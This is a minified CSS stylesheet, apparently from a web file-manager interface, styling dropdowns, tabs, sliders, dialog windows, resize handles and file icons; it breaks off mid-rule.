.xdsoft_time_box{border:none;height:203px;}div.xdsoft_datetimepicker .xdsoft_timepicker .xdsoft_time_box >div >div{background:none;border:none;}span.select2-container--default .select2-dropdown,span.select2-container--classic .select2-dropdown{box-shadow:0 2px 10px rgba(0,0,0,0.2);border:1px solid #ccc;overflow:hidden;}span.select2-container--default .select2-dropdown .select2-search__field,span.select2-container--classic .select2-dropdown .select2-search__field{border:1px solid #ccc;}span.select2-container--default .select2-selection--multiple,span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--multiple,span.select2-container--classic .select2-selection--single{border:1px solid #ccc;border-radius:4px;outline:none;min-height:32px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice,span.select2-container--default .select2-selection--single .select2-selection__choice,span.select2-container--classic .select2-selection--multiple .select2-selection__choice,span.select2-container--classic .select2-selection--single .select2-selection__choice{background-color:#edf5ff;color:#3a96ff;border-color:#badaff;height:24px;line-height:22px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove{float:right;font-size:15px;color:#3a96ff;width:20px;height:22px;line-height:18px;text-align:center;margin-right:-2px;}span.select2-container--default .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--default .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--multiple .select2-selection__choice .select2-selection__choice__remove:hover,span.select2-container--classic .select2-selection--single .select2-selection__choice .select2-selection__choice__remove:hover{color:#0063d3;}span.select2-container--default.select2-container--focus .select2-selection--multiple,span.select2-container--default.select2-container--focus .select2-selection--single,span.select2-container--classic.select2-container--focus .select2-selection--multiple,span.select2-container--classic.select2-container--focus .select2-selection--single{border:1px solid #3a96ff;}span.select2-container--default .select2-selection--single,span.select2-container--classic .select2-selection--single{background:#f8f8f8 url("../../../images/common//bg.gif") 0px -10px repeat-x;}span.select2-container--default .select2-selection--single .select2-selection__arrow,span.select2-container--classic .select2-selection--single .select2-selection__arrow{height:30px;width:26px;}span.select2-container--default .select2-selection--multiple ul.select2-selection__rendered:after,span.select2-container--classic .select2-selection--multiple ul.select2-selection__rendered:after{content:"";width:23px;height:50%;display:block;color:#aaa;position:absolute;right:1px;top:50%;margin-top:-7px;text-align:center;font-family:FontAwesome;}span.select2-container--default .select2-selection--multiple .select2-search--inline,span.select2-container--classic .select2-selection--multiple .select2-search--inline{height:29px;line-height:23px;}span.select2-container--default .select2-results.group-list-content>.select2-results__options,span.select2-container--classic .select2-results.group-list-content>.select2-results__options{z-index:100;width:100%;height:250px;max-height:250px;}span.select2-container--default .select2-results__option,span.select2-container--classic .select2-results__option{position:relative;}span.select2-container--default .select2-search--inline .select2-search__field,span.select2-container--classic .select2-search--inline .select2-search__field{padding-top:1px;}span.select2-container--default .select2-results__option[aria-selected=true],span.select2-container--default .select2-results__option[aria-selected=true].select2-results__option--highlighted,span.select2-container--classic .select2-results__option[aria-selected=true],span.select2-container--classic .select2-results__option[aria-selected=true].select2-results__option--highlighted{background:#edf5ff;color:#3a96ff;}span.select2-container--default .select2-results__option[aria-selected=true]:after,span.select2-container--classic .select2-results__option[aria-selected=true]:after{content:"\f00c";color:#3a96ff;position:absolute;right:10px;font-size:14px;font-family:FontAwesome;}span.select2-container--default .select2-results__option--highlighted[aria-selected],span.select2-container--classic .select2-results__option--highlighted[aria-selected]{background-color:#eee;color:#444;}span.select2-container--default.select2-container--open.select2-container--above .select2-selection--single,span.select2-container--classic.select2-container--open.select2-container--above .select2-selection--single{border-top:1px solid transparent;}span.select2-container--default.select2-container--open.select2-container--below .select2-selection--multiple,span.select2-container--classic.select2-container--open.select2-container--below .select2-selection--multiple{border-bottom:1px solid transparent;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--below,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--below{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:-1px;}span.select2-container--default.select2-container--open .select2-dropdown.select2-dropdown--above,span.select2-container--classic.select2-container--open .select2-dropdown.select2-dropdown--above{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);margin-top:1px;box-shadow:0 -2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default.select2-container--open .select2-selection--multiple,span.select2-container--default.select2-container--open .select2-selection--single,span.select2-container--classic.select2-container--open .select2-selection--multiple,span.select2-container--classic.select2-container--open .select2-selection--single{border-color:#3a96ff;outline:none;box-shadow:0 0 20px #71c0ff;border-color:#bfcbd9;box-shadow:0 2px 4px rgba(0,0,0,0.12), 0 0 6px rgba(0,0,0,0.04);}span.select2-container--default .ztree,span.select2-container--classic .ztree{padding:0;}span.select2-container--default .ztree li a,span.select2-container--classic .ztree li a{padding-left:0;height:26px;line-height:26px;border:none;margin:0;border-radius:0;}span.select2-container--default .ztree li a.this,span.select2-container--classic .ztree li a.this{background:#edf5ff;border:none;height:26px;line-height:26px;}span.select2-container--default .ztree li a.this:hover,span.select2-container--classic .ztree li a.this:hover{color:#3a96ff;}span.select2-container--default .ztree li a:hover,span.select2-container--classic .ztree li a:hover{border:none;margin:0;border-radius:0;color:#3a96ff;}span.select2-container--default .ztree .check-icon,span.select2-container--classic .ztree .check-icon{float:right;color:#fff;font-size:12px;text-align:center;width:15px;height:15px;line-height:15px;padding:0;margin-top:5px;margin-right:5px;-webkit-transition:all .1s ease-in-out;-moz-transition:all .1s ease-in-out;-o-transition:all .1s ease-in-out;-ms-transition:all .1s ease-in-out;transition:all .1s ease-in-out;}span.select2-container--default .ztree .check-icon:before,span.select2-container--classic .ztree .check-icon:before{content:"\f";}span.select2-container--default .ztree a.this .check-icon:before,span.select2-container--classic .ztree a.this .check-icon:before{content:"\f00c";color:#3a96ff;}body .select2-container{width:270px;margin-right:10px;}.tab-group{text-align:center;margin-bottom:-12px;}.tab-group .tab-item{background:#fff;text-align:left;display:inline-block;margin-left:-5px;border:1px solid #ccc;border-bottom-color:#a6a6a6;border-right-color:#b8b8b8;}.tab-group .tab-item:hover{background:#e6e6e6;}.tab-group .tab-item:first-child{border-top-left-radius:3px;border-bottom-left-radius:3px;}.tab-group .tab-item:last-child{border-top-right-radius:3px;border-bottom-right-radius:3px;}.tab-group .tab-item a{text-decoration:none;color:#444;padding:0 15px;height:24px;display:inline-block;line-height:24px;}.tab-group .tab-item.active a{color:#fff;}.tab-group .tab-item.active,.tab-group .tab-item.active:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#6eb4f7', endColorstr='#1a82fb');background-image:-webkit-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-moz-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-o-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:-ms-linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);background-image:linear-gradient(to bottom,#6eb4f7 0,#1a82fb 100%);-pie-background:linear-gradient(to to bottom,#6eb4f7 0,#1a82fb 100%);color:#fff;z-index:10;border-color:#3f87dc;border-top-color:#4396e6;border-color:#388df8 #388df8 #0866dc transparent;}.tab-group .tab-item.active:hover,.tab-group .tab-item.active:active{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#3e9bf4', endColorstr='#0469de');background-image:-webkit-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-moz-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-o-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:-ms-linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);background-image:linear-gradient(to bottom,#3e9bf4 0,#0469de 100%);-pie-background:linear-gradient(to to bottom,#3e9bf4 0,#0469de 100%);}.tab-group .tab-item:last-child.active,.tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .slider .slider-track{background:#ddd;box-shadow:none;}body .slider.slider-horizontal .slider-track{height:6px;}body .slider .slider-selection{transition:background-color .3s ease;background:#2196f3;box-shadow:none;}body .slider .slider-handle{margin-left:-7px;margin-top:-6px;width:14px;height:14px;cursor:pointer;border-radius:50%;border:2px solid #88c7f4;background:#fff;transition:border-color .3s ease, transform .3s cubic-bezier(.18,.89,.32,1.28);}body .slider .slider-handle.round:hover{box-shadow:0 0 0 6px rgba(150,219,250,0.7);}body .slider .tooltip{transition:all 0.168s cubic-bezier(0,0.84,0.58,1);}body .slider .tooltip.top{margin-top:-43px;}body .slider .tooltip.bottom{margin-top:20px;}body .slider .tooltip.top .tooltip-arrow{border-top-color:rgba(0,0,0,0.7);}body .slider .tooltip.bottom .tooltip-arrow{border-bottom-color:rgba(0,0,0,0.7);}body .slider .tooltip-inner{background-color:rgba(0,0,0,0.7);box-shadow:0 1px 5px rgba(0,0,0,0.2);padding:8px 15px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .aui-outer .aui-buttons{box-shadow:0 0 20px #ddd;border-top:1px solid #eee;height:45px;padding-top:5px;border-top:none;background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{left:130px;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{position:absolute;left:0;padding:0;width:140px;height:100%;padding-top:20px;z-index:99999;background:#f5f7fa;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{display:block;border:none;background:none;border-radius:0;font-size:14px;-webkit-transition:0.16s all;-moz-transition:0.16s all;-o-transition:0.16s all;-ms-transition:0.16s all;transition:0.16s all;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:hover{background:#eee;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:first-child,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child{border-radius:0;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item a{padding:0 20px 0 15px;display:block;height:40px;line-height:40px;text-align:right;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active{background:#fff;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:hover a,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active:active a{color:#2196F3;}body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item:last-child.active,body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item.active + .tab-item{border-left-color:transparent;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header{height:40px;border-bottom:1px solid #adabad;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#d3d1d3', endColorstr='#e7e5e7');background-image:-webkit-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-moz-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-o-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:-ms-linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);background-image:linear-gradient(bottom,#d3d1d3 0%,#e7e5e7 100%);-pie-background:linear-gradient(to bottom,#d3d1d3 0%,#e7e5e7 100%);}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title{height:40px;line-height:40px;padding-left:20px;font-size:12px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title img,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-header .modal-title .x-item-file{height:22px;width:22px;top:8px;margin-right:4px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row .setting-title{text-align:right;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.form-userSelect .setting-content{background:#f4f4f4;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .form-row.error .setting-content{background:#ffefed;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body{background:#eee;border:1px solid #e3e3e3;margin:20px;top:60px;bottom:30px;}body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body .line,body .dialog-plugin-config.dialog-form-style-mac .form-box.config-box .panel-body hr{border-color:#ddd;}body .dialog-plugin-config.dialog-form-style-mac .tab-group{position:absolute;margin-top:25px;width:100%;z-index:999;}body .dialog-plugin-config.dialog-form-style-mac .aui-content{background:#f9f9f9;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-title{height:40px;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons{padding-right:20px;height:30px;border-top:1px solid #ddd;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f2f4f7', endColorstr='#f5f7fa');background-image:-webkit-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-moz-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-o-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:-ms-linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);background-image:linear-gradient(left,#f2f4f7 0%,#f5f7fa 100%);-pie-background:linear-gradient(to left,#f2f4f7 0%,#f5f7fa 100%);background:#f9f9f9;border:none;}body .dialog-plugin-config.dialog-form-style-mac .aui-outer .aui-buttons button{margin-top:1px;margin-left:20px;padding:0 2em;height:25px;}.message-box{position:absolute;top:15%;left:0px;z-index:88;background:#63acff;color:#fff;opacity:0.7;filter:alpha(opacity=70);-webkit-border-radius:1px;-moz-border-radius:1px;border-radius:1px;-webkit-box-shadow:0 10px 60px rgba(0,0,0,0.6);-moz-box-shadow:0 10px 60px rgba(0,0,0,0.6);box-shadow:0 10px 60px rgba(0,0,0,0.6);display:none;}.message-box .content{padding:10px 30px;line-height:20px;width:auto;}.aui-outer{text-align:left;position:relative;}.aui-mask{position:absolute;width:100%;height:100%;background:#fff;opacity:0.01;filter:alpha(opacity=1);}.aui-loading{height:100%;width:100%;overflow:hidden;opacity:0.7;filter:alpha(opacity=70);position:absolute;left:0;top:40px;z-index:9999;text-align:center;text-indent:-999em;}.aui-loading span{width:80px;height:80px;border-radius:6px;background:#fff url("../../../images/common/dialog/dialog_loading.gif") no-repeat center center;position:absolute;left:50%;top:50%;margin-left:-40px;margin-top:-40px;}table.aui-border,table.aui-dialog{width:100%;border:0;margin:0;border-collapse:collapse;}.aui-nw,.aui-n,.aui-ne,.aui-w,.aui-c,.aui-e,.aui-sw,.aui-s,.aui-se,.aui-header,.aui-td-icon,.aui-main,.aui-footer{padding:0;}.aui-header,.aui-buttons button{font:12px/1.11;}.aui-title{overflow:hidden;text-overflow:ellipsis;font-size:1em;}.aui-title img,.aui-title .x-item-file{width:20px;margin-right:5px;border-radius:4px;cursor:pointer;pointer-events:all;}.aui-title img:hover,.aui-title .x-item-file:hover{transform:scale(1.1,1.1);}.aui-state-no-title .aui-title{display:none;}.aui-main{font-size:1.1em;text-align:center;background:#FFF;min-width:9em;min-width:0 \9;visibility:auto;}.aui-content{text-align:left;color:#666;border:none 0;}.aui-content{width:100%;height:100%;}.aui-content.aui-state-full{display:block;width:100%;margin:0;padding:0 !important;height:100%;}.aui-icon{vertical-align:middle;background:#fff;}.aui-icon div{width:48px;height:48px;margin:10px 0 10px 10px;background-position:center center;background-repeat:no-repeat;}.aui-buttons{padding:10px 8px;text-align:right;white-space:nowrap;background-color:#F6F6F6;border-top:solid 1px #DADEE5;}.aui-buttons button{margin-left:15px;padding:3px 20px;height:25px;cursor:pointer;display:inline-block;text-align:center;line-height:1;overflow:visible;color:#000000;border:none;background:#aaa;color:#fff;}.aui-buttons button:focus{outline:none 0;}.aui-buttons button:hover{background:#c4c4c4;}.aui-buttons button:active{background:#777777;}.aui-buttons button[disabled]{cursor:default;color:#919191;background:#aaa;opacity:0.5;filter:alpha(opacity=50);}.aui-buttons button::-moz-focus-inner{border:0;padding:0;margin:0;}.aui-buttons button.aui-state-highlight{color:#FFF;background:#63acff;}.aui-buttons button.aui-state-highlight:hover{color:#FFF;background:#96c7ff;}.aui-buttons button.aui-state-highlight:active{background:#0076fc;}.aui-buttons button.disable,.aui-buttons button.disabled{opacity:0.3;filter:alpha(opacity=30);}.aui-outer{border:0px solid #63acff;-webkit-box-shadow:0px 5px 20px rgba(0,0,0,0.6);-moz-box-shadow:0px 5px 20px rgba(0,0,0,0.6);box-shadow:0px 5px 20px rgba(0,0,0,0.6);-webkit-transition:box-shadow 0.1s opacity 0.2s;-moz-transition:box-shadow 0.1s opacity 0.2s;-o-transition:box-shadow 0.1s opacity 0.2s;-ms-transition:box-shadow 0.1s opacity 0.2s;transition:box-shadow 0.1s opacity 0.2s;}.aui-state-lock .aui-nw,.aui-state-lock .aui-n,.aui-state-lock .aui-ne,.aui-state-lock .aui-w,.aui-state-lock .aui-e,.aui-state-lock .aui-sw,.aui-state-lock .aui-s,.aui-state-lock .aui-se{background:rgba(0,0,0,0.5);background:#000 \9 !important;opacity:0.5;filter:alpha(opacity=50);}.aui-title-bar{position:relative;height:100%;}.aui-title{height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;background-color:#7dbaff;}.aui-state-focus .aui-mask{display:none;}.aui-state-focus .aui-outer{-webkit-box-shadow:0px 5px 40px rgba(0,0,0,0.7);-moz-box-shadow:0px 5px 40px rgba(0,0,0,0.7);box-shadow:0px 5px 40px rgba(0,0,0,0.7);}.aui-state-focus .aui-title{background-color:#63acff;}.aui-state-drag .aui-title{cursor:move;cursor:-webkit-grabbing;cursor:grabbing;}.aui-min,.aui-max,.aui-close{display:block;position:absolute;text-decoration:none;outline:none;cursor:pointer;font-size:1.25em;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;color:#fff;border-top:none;top:0px;height:22px;width:35px;font-size:1.15em;line-height:22px;text-align:center;background-color:transparent;height:24px;width:38px;line-height:25px;color:#ffffff;font-family:FontAwesome;}.aui-min:hover,.aui-max:hover,.aui-close:hover{text-decoration:none;color:#fff;background-color:#1783ff;}.aui-close:hover{background:#cc0000;}.aui-min{right:82px;content:"\f068";}.aui-max{right:43px;content:"\f065";}.aui-close{right:5px;content:"\f00d";}.aui-min:before{content:"\f068";}.aui-max:before{content:"\f065";}.aui-close:before{content:"\f00d";}.aui-max,.aui-min{display:none;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-se{width:5px;height:5px;}.aui-state-no-title .aui-title-bar{bottom:0;_bottom:0;_margin-top:0;}.aui-state-no-title .aui-outer{box-shadow:none !important;border:none !important;}.aui-state-no-title .aui-inner{border:1px solid #aaa;}.aui-state-no-title .tips{padding:15px;padding-left:10px;}.aui-state-no-title .aui-nw,.aui-state-no-title .aui-n,.aui-state-no-title .aui-ne,.aui-state-no-title .aui-w,.aui-state-no-title .aui-e,.aui-state-no-title .aui-sw,.aui-state-no-title .aui-s,.aui-state-no-title .aui-se{background:rgba(0,0,0,0.1);background:#000 \9 !important;filter:alpha(opacity=10)!important;}.aui-state-no-title .aui-close,.aui-state-no-title .aui-max,.aui-state-no-title .aui-min{display:none;font-size:1em;}.dialog-max .aui-nw,.dialog-max .aui-ne,.dialog-max .aui-sw,.dialog-max .aui-se,.dialog-max .aui-w,.dialog-max .aui-e{width:0px;}.dialog-max .aui-sw,.dialog-max .aui-n,.dialog-max .aui-se{height:0px;}.dialog-max .aui-outer{border:none !important;}.dialog-can-resize .resize-handle{position:absolute;z-index:999999;display:block;}.dialog-can-resize .resize-top{cursor:n-resize;top:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-bottom{cursor:s-resize;bottom:-3px;left:0px;height:7px;width:100%;}.dialog-can-resize .resize-right{cursor:e-resize;right:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-left{cursor:w-resize;left:-3px;top:0px;width:7px;height:100%;}.dialog-can-resize .resize-bottom-right{cursor:se-resize;width:18px;height:18px;right:-7px;bottom:-7px;background:url('../../../images/common/dialog/resize_corner.png') no-repeat;opacity:0.4;filter:alpha(opacity=40);}.dialog-can-resize .resize-bottom-left{cursor:sw-resize;width:15px;height:15px;left:-7px;bottom:-7px;}.dialog-can-resize .resize-top-left{cursor:nw-resize;width:15px;height:15px;left:-7px;top:-7px;}.dialog-can-resize .resize-top-right{cursor:ne-resize;width:15px;height:15px;right:-5px;top:-7px;}.dialog-can-resize .aui-min,.dialog-can-resize .aui-max{display:block;}.dialog-min-size{width:250px !important;height:30px !important;}.dialog-min-size.dialog-no-title .aui-title,.dialog-min-size .aui-title{opacity:1 !important;}.dialog-min-size .aui-outer{width:250px;}.dialog-min-size .aui-header{height:30px;}.dialog-min-size .aui-title{text-align:left;padding-left:10px;}.dialog-min-size .aui-main,.dialog-min-size .aui-footer{display:none;}.dialog-min-size .resize-handle{display:none;}.dialog-no-title .aui-title-bar{position:absolute;z-index:99999;width:100%;height:30px;top:0;}.dialog-no-title .aui-title{opacity:0.01 !important;filter:alpha(opacity=1) !important;}.dialog-no-title .aui-inner{border:none;}.dialog-no-title .aui-nw,.dialog-no-title .aui-n,.dialog-no-title .aui-ne,.dialog-no-title .aui-w,.dialog-no-title .aui-e,.dialog-no-title .aui-sw,.dialog-no-title .aui-s,.dialog-no-title .aui-se{display:none;}.dialog-no-title .aui-outer .aui-min{right:80px;}.dialog-no-title .aui-outer .aui-min:before{content:"\f068" !important;}.dialog-no-title .aui-outer .aui-max{right:40px;}.dialog-no-title .aui-outer .aui-max:before{content:"\f065" !important;}.dialog-no-title .aui-outer .aui-close{right:0px;}.dialog-no-title .aui-outer .aui-close:before{content:"\f00d" !important;}.dialog-no-title .aui-outer .aui-min,.dialog-no-title .aui-outer .aui-max,.dialog-no-title .aui-outer .aui-close{display:block;position:absolute;text-decoration:none;outline:none;font-size:1.25em;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;color:#fff;top:0px;cursor:pointer;height:30px;line-height:30px;text-align:center;background-color:transparent;width:40px;font-family:FontAwesome;border:none;background-image:none;border-radius:0;}.dialog-no-title .aui-outer .aui-min:hover,.dialog-no-title .aui-outer .aui-max:hover,.dialog-no-title .aui-outer .aui-close:hover{color:#fff;border:none;box-shadow:none;background:#41acf8;background:rgba(0,0,0,0.4);}.dialog-no-title .aui-outer .aui-close:hover{background:#e81123;background:rgba(232,17,35,0.8);}.dialog-no-title.header-bg .aui-content .header{height:90px;background-color:#008def;background-image:linear-gradient(to bottom,#084998 0,#00a9fb 100%);color:#fff;position:relative;}.dialog-no-title.header-bg .aui-content .header .bg{background:url("../../../images/common/banner/box.png") 180px -220px no-repeat;width:100%;height:100%;position:absolute;opacity:0.7;}.dialog-no-title.dialog-max .aui-outer .aui-max{right:40px;}.dialog-no-title.dialog-max .aui-outer .aui-max:before{content:"\f066" !important;}body div.dialog-simple .aui-title-bar{width:100%;position:relative;bottom:0;height:100%;}body div.dialog-simple .aui-border{border:none;overflow:auto;}body div.dialog-simple .aui-outer{border:none;border-radius:none;box-shadow:none;background:none;}body div.dialog-simple .aui-inner{border:none;background:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-n,body div.dialog-simple .aui-ne,body div.dialog-simple .aui-w,body div.dialog-simple .aui-e,body div.dialog-simple .aui-sw,body div.dialog-simple .aui-s,body div.dialog-simple .aui-se{background:none;}body div.dialog-simple .aui-title{background:rgba(0,0,0,0.8);opacity:0.8;filter:alpha(opacity=80);border-radius:3px;border:none;height:31px;line-height:30px;padding:0 28px 0 10px;color:#fff;}body div.dialog-simple .aui-min,body div.dialog-simple .aui-max,body div.dialog-simple .aui-close{border:none;top:5px;position:absolute;text-decoration:none;outline:none;cursor:pointer;background-color:rgba(255,255,255,0.3);color:#fff;opacity:0.5;filter:alpha(opacity=50);height:22px;width:22px;font-size:1.15em;line-height:22px;text-align:center;border-radius:4px;font-family:FontAwesome;}body div.dialog-simple .aui-min:hover,body div.dialog-simple .aui-max:hover,body div.dialog-simple .aui-close:hover{text-decoration:none;color:#fff;background-color:#cc0000;}body div.dialog-simple .aui-min:active,body div.dialog-simple .aui-max:active,body div.dialog-simple .aui-close:active{color:fff;background-color:#f00;}body div.dialog-simple .aui-main{background:none !important;}body div.dialog-simple .aui-max{right:30px;}body div.dialog-simple .aui-min{right:56px;}body div.dialog-simple .aui-dialog,body div.dialog-simple .aui-border{background:none;}body div.dialog-simple .resize-bottom-right{background:none !important;}body div.dialog-simple .aui-header{opacity:0.01;filter:alpha(opacity=1);border:1px solid rgba(0,0,0,0.01);border-bottom:none;}body div.dialog-simple .aui-nw,body div.dialog-simple .aui-ne{height:0px;}body div.dialog-simple.aui-state-drag .aui-header,body div.dialog-simple .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-can-resize .aui-max,body div.dialog-simple.dialog-can-resize .aui-min{display:block;}body div.dialog-simple.dialog-can-resize .aui-main{border:1px solid rgba(0,0,0,0.01);border-top:none;}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-main,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-main{border-color:rgba(0,0,0,0.2);}body div.dialog-simple.dialog-can-resize.aui-state-drag .aui-header,body div.dialog-simple.dialog-can-resize .dialog-mouse-in .aui-header{opacity:1.0;filter:alpha(opacity=100);border-color:rgba(0,0,0,0.2);}body div.dialog-simple.aui-state-drag .aui-header{opacity:1.0;filter:alpha(opacity=100);}body div.dialog-simple.dialog-max .aui-header{opacity:1.0;filter:alpha(opacity=100);}.x-item-small{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.x-item-file{background-repeat:no-repeat;background-size:cover;background-position:center;background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');width:100%;height:100%;display:inline-block;pointer-events:none;}.x-item-file.small{width:20px;height:20px;}.file-list-icon .file .ico .x-item-file{border-radius:5px;margin-top:6px;margin-top:4px;}.bindary-box .ico .x-item-file{width:90px;height:90px;margin-top:28px;}.file-list-list .file .ico .x-item-file,.file-list-split .file .ico .x-item-file{border:none;}.ztree li span.tree_icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.header-content #yarnball .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.task-tab .tabs .tab .x-item-file,.task-tab .tabs .tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.tasktab-dragging.tab img{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.aui-title .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.edit-tab .tabs .tab .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.draggable-dragging .name .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.do-search-box .search-result .file-item .file-info .file-icon .x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;}.context-menu-list .context-menu-item .font-icon.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;margin-right:12px;}.context-menu-list .context-menu-item .font-icon.x-item-file:before{content:"";}.context-menu-list .context-menu-item img.x-item-file{position:relative;width:18px;height:18px;margin-right:4px;background-size:100% auto;vertical-align:middle;background:none;margin-right:12px;height:auto;}.aui-title .x-item-file.x-font-icon{font-size:12px;line-height:18px;color:#fff;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to 164deg,rgba(255,255,255,0.5),rgba(255,255,255,0));}.x-txt.small,.x-textile.small,.x-inc.small,.x-log.small{background-image:url("../../../images/file_icon/icon_file/txt_small.png");background-image:none 